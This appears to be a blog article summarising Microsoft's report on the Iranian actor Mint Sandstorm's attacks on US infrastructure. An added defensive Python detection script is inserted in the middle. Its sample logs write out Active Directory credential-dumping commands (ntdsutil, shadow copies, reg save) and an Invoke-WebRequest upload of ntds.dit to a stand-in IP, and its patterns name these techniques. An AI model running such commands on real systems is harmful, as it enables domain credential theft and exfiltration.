Sunday, May 26, 2024

Iranian government-supported hackers are targeting the energy and transportation systems of the United States.

According to an analysis by the Microsoft Threat Intelligence team, between late 2021 and mid-2022 a subgroup of the Iranian government-backed actor Microsoft tracks as Mint Sandstorm targeted critical infrastructure in the U.S. Microsoft describes the subgroup as highly capable and agile in its operational focus, which appears to align with Iran’s national priorities.

The targets of the attacks include seaports, energy companies, transit systems, and a major U.S. utility and gas company. The activity is thought to be retaliatory, following attacks on Iran’s maritime, railway, and gas station payment systems between May 2020 and late 2021. Iran subsequently accused Israel and the U.S. of masterminding the gas station attacks in an attempt to destabilize the country.

Microsoft previously tracked the threat actor under the name Phosphorus. The same actor is also known as APT35, Charming Kitten, ITG18, TA453, and Yellow Garuda. The Mint Sandstorm name comes from Microsoft’s move from chemical-element monikers to a weather-themed threat actor naming taxonomy, a change the company attributed to the increasing “complexity, scale, and volume of threats.”

Unlike MuddyWater, which is known to operate on behalf of Iran’s Ministry of Intelligence and Security (MOIS), Mint Sandstorm is associated with the Islamic Revolutionary Guard Corps (IRGC). The attacks conducted by Mint Sandstorm demonstrate the adversary’s ability to continually refine its tactics, using highly targeted phishing campaigns to gain access to victim environments.

This includes rapidly adopting publicly disclosed proofs-of-concept (PoCs) for vulnerabilities in internet-facing applications, such as CVE-2022-47966 and CVE-2022-47986, into its playbook for initial access and persistence. After a successful intrusion, a custom PowerShell script is deployed that triggers one of two attack chains. The first chain uses additional PowerShell scripts to connect to remote servers and exfiltrate the Active Directory database.

The second chain uses Impacket to connect to an actor-controlled server and deploy Drokbk and Soldier. Soldier is a multistage .NET backdoor that can download and run additional tools and uninstall itself.
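The article does not say how the operators obtained the Active Directory database, so the following is an added detection example, not code from Microsoft or from the report it summarizes. It scans PowerShell script-block log text (the kind of content found in Event ID 4104 records) for the generic techniques used to steal ntds.dit, which are an assumption about the actor's method, and for the HTTP-upload and Impacket activity the two chains above describe. The log lines are constructed for the example; the indicator names, the `assess` verdict levels, and the IP address are all invented here.

```python
import re

# Constructed sample script-block lines (what Event ID 4104 ScriptBlockText
# might contain). Invented for this example, not from any real incident.
SAMPLE_LOGS = [
    "Get-ChildItem C:\\Users\\admin\\Documents",
    "ntdsutil.exe \"ac i ntds\" \"ifm\" \"create full C:\\Temp\\dump\" q q",
    "vssadmin create shadow /for=C:",
    "Copy-Item \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1"
    "\\Windows\\NTDS\\ntds.dit C:\\Temp\\ntds.dit",
    "reg save HKLM\\SYSTEM C:\\Temp\\system.hiv",
    "Invoke-WebRequest -Uri http://203.0.113.10/up -Method POST -InFile C:\\Temp\\ntds.dit",
    "Get-Service | Where-Object {$_.Status -eq 'Running'}",
]

# (indicator name, pattern, ATT&CK technique for triage context). The names are
# local to this example; the patterns cover common ways to acquire ntds.dit
# plus the SYSTEM hive needed to decrypt it, and two exfil/tooling signals.
INDICATORS = [
    ("ntdsutil_ifm", re.compile(r"ntdsutil.*\bifm\b", re.I), "T1003.003"),
    ("shadow_copy_create", re.compile(
        r"vssadmin\s+create\s+shadow|wmic\s+shadowcopy\s+call\s+create|Win32_ShadowCopy",
        re.I), "T1003.003"),
    ("shadow_copy_read", re.compile(r"HarddiskVolumeShadowCopy\d+", re.I), "T1003.003"),
    ("ntds_dit_access", re.compile(r"ntds\.dit", re.I), "T1003.003"),
    ("esentutl_copy", re.compile(r"esentutl.*\s/y\s", re.I), "T1003.003"),
    ("system_hive_save", re.compile(r"reg(\.exe)?\s+save\s+HKLM\\SYSTEM", re.I), "T1003.002"),
    ("secretsdump", re.compile(r"secretsdump", re.I), "T1003.006"),
    ("http_upload", re.compile(r"Invoke-(WebRequest|RestMethod).*-(InFile|Body)", re.I), "T1048"),
]

# Indicators that show the database itself being acquired ...
ACQUIRE = {"ntdsutil_ifm", "shadow_copy_read", "ntds_dit_access", "esentutl_copy", "secretsdump"}
# ... versus steps that make it usable or move it off the host.
STAGE_OR_EXFIL = {"system_hive_save", "http_upload"}


def scan_script_block(line):
    """Return the indicator names that fire on a single script-block line."""
    return [name for name, rx, _ in INDICATORS if rx.search(line)]


def scan_logs(lines):
    """Return (index, line, [indicators]) for every line with at least one hit."""
    hits = []
    for i, line in enumerate(lines):
        names = scan_script_block(line)
        if names:
            hits.append((i, line, names))
    return hits


def assess(lines):
    """Roll per-line hits up to a host-level verdict.

    'likely_ad_dump' requires both an acquisition step and a staging/exfil step,
    because a lone shadow-copy or ntds.dit mention also occurs in legitimate
    backup and DC maintenance activity.
    """
    seen = set()
    for _, _, names in scan_logs(lines):
        seen.update(names)
    if seen & ACQUIRE and seen & STAGE_OR_EXFIL:
        verdict = "likely_ad_dump"
    elif seen:
        verdict = "suspicious"
    else:
        verdict = "none"
    return {"indicators": sorted(seen), "verdict": verdict}


if __name__ == "__main__":
    for idx, line, names in scan_logs(SAMPLE_LOGS):
        print(f"[{idx}] {', '.join(names)}: {line}")
    print(assess(SAMPLE_LOGS))
```

In practice the same patterns would be applied to 4104 ScriptBlockText fields and to process-creation command lines (Sysmon Event ID 1 or Security 4688), and the shadow-copy and ntdsutil indicators should be allow-listed for known backup jobs before alerting on them.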

In addition, Microsoft identified Mint Sandstorm as carrying out low-volume phishing campaigns that deliver a custom, modular PowerShell-based backdoor named CharmPower, which can gather host information, read files, and extract data. The intrusion capabilities of the Mint Sandstorm subgroup are concerning because they allow operators to hide their command-and-control communication, sustain their presence in a compromised system, and employ a range of post-compromise tools with unique functionality.
